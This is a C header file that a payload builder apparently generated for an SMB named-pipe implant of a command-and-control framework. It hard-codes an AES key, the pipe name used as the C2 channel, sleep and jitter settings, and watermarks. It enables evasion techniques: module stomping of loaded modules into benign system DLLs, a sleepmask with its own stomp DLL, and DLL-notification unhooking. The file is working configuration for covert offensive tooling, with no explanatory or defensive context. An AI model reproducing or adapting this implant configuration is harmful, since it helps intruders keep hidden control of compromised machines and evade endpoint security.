/* Config.h - generated by BuildPayload (SMB)
 *
 *   Pipe:     naxsmb
 *   AES Key:  ea92316cf0f2aa1460625e97baa02d9c
 *   Sleep:    0 ms   Jitter: 0%
 */

#pragma once

#define NAX_SLEEP_MS    0u
#define NAX_JITTER_PCT  0u
#define NAX_SID_LEN     17u
#define NAX_WATERMARK   0xA04A4178u
#define NAX_LISTENER_WM 0x69E1EB44u

#define NAX_GATE_WAITFORSINGLEOBJECT
#define NAX_GATE_WAITFORMULTIPLEOBJECTS

#define NAX_AES_KEY_WRITE( p ) do { \
    (p)[ 0]=0xEA; (p)[ 1]=0x92; (p)[ 2]=0x31; (p)[ 3]=0x6C; (p)[ 4]=0xF0; (p)[ 5]=0xF2; (p)[ 6]=0xAA; (p)[ 7]=0x14; \
    (p)[ 8]=0x60; (p)[ 9]=0x62; (p)[10]=0x5E; (p)[11]=0x97; (p)[12]=0xBA; (p)[13]=0xA0; (p)[14]=0x2D; (p)[15]=0x9C; \
} while(0)

#define NAX_C2_URL_WRITE( p ) do { \
    (p)[ 0]='n'; (p)[ 1]='a'; (p)[ 2]='x'; (p)[ 3]='s'; (p)[ 4]='m'; (p)[ 5]='b'; \
    (p)[ 6]='\0'; \
} while(0)


/* ---- sleep obfuscation defaults ---- */
#define NAX_DEFAULT_SLEEP_OBF   0

/* ---- BOF module stomping ---- */
#define NAX_BOF_STOMP 1

#define NAX_BOF_SYNC_DLL_WRITE( p ) do { \
    (p)[ 0]=L'c'; (p)[ 1]=L'h'; (p)[ 2]=L'a'; (p)[ 3]=L'k'; \
    (p)[ 4]=L'r'; (p)[ 5]=L'a'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_COUNT 2

#define NAX_BOF_ASYNC_0_WRITE( p ) do { \
    (p)[ 0]=L'j'; (p)[ 1]=L's'; (p)[ 2]=L'c'; (p)[ 3]=L'r'; \
    (p)[ 4]=L'i'; (p)[ 5]=L'p'; (p)[ 6]=L't'; (p)[ 7]=L'9'; \
    (p)[ 8]=L'.'; (p)[ 9]=L'd'; (p)[10]=L'l'; (p)[11]=L'l'; \
    (p)[12]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_1_WRITE( p ) do { \
    (p)[ 0]=L'd'; (p)[ 1]=L'3'; (p)[ 2]=L'd'; (p)[ 3]=L'1'; \
    (p)[ 4]=L'1'; (p)[ 5]=L'.'; (p)[ 6]=L'd'; (p)[ 7]=L'l'; \
    (p)[ 8]=L'l'; \
    (p)[ 9]=L'\0'; \
} while(0)

/* ---- sleepmask stomp DLL ---- */
#define NAX_SM_STOMP_DLL_WRITE( p ) do { \
    (p)[ 0]=L'm'; (p)[ 1]=L's'; (p)[ 2]=L'x'; (p)[ 3]=L'm'; \
    (p)[ 4]=L'l'; (p)[ 5]=L'6'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

/* ---- DLL notification unhooking ---- */
#define NAX_UNHOOK_DLL_NOTIFY 1

/* ---- embedded sleepmask BOF ---- */
#define NAX_SLEEPMASK_LEN  3723u
#include "Config_sleepmask.h"
